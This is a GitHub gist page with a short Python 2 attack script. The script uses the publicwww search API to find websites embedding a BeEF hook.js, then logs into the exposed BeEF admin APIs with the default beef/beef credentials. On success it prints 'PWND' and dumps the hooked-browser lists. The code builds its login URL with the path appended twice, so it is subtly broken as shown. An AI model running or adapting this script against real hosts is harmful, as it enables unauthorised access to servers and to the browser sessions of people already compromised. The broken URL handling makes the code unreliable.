Skip to content

Instantly share code, notes, and snippets.

@tmap
Created September 27, 2018 10:48
Show Gist options
  • Save tmap/86e8b3ea63897252b32ff153fcc72792 to your computer and use it in GitHub Desktop.
Save tmap/86e8b3ea63897252b32ff153fcc72792 to your computer and use it in GitHub Desktop.
pwn beef instances on hacked websites through "publicwww" API
import requests
from contextlib import closing
import csv
import sys
api_key = "publicwww_apikey"
search_for_hook_js="%223000%2Fhook.js%22"
try:
req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key
print req
with closing(requests.get(req, stream=True)) as r:
reader = csv.reader(r.iter_lines(), delimiter=';', quotechar='"')
for row in reader:
try:
stripped_url= row[2].split('/hook.js', 1)[0]
url_to_run=stripped_url+'/api/admin/login'
print stripped_url
r = requests.post(url_to_run+"/api/admin/login", json = {'username':'beef', 'password':'beef'})
if r.status_code==200:
print 'PWND',stripped_url
data=r.json()
token=data['token']
rg = requests.get(url_to_run+'/api/hooks?token='+str(token))
print rg.text
elif r.status_code==401:
print 'Wrong passwd',stripped_url
else:
continue
except:
pass
except Exception as e:
print 'Error: %s' % e
sys.exit(1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment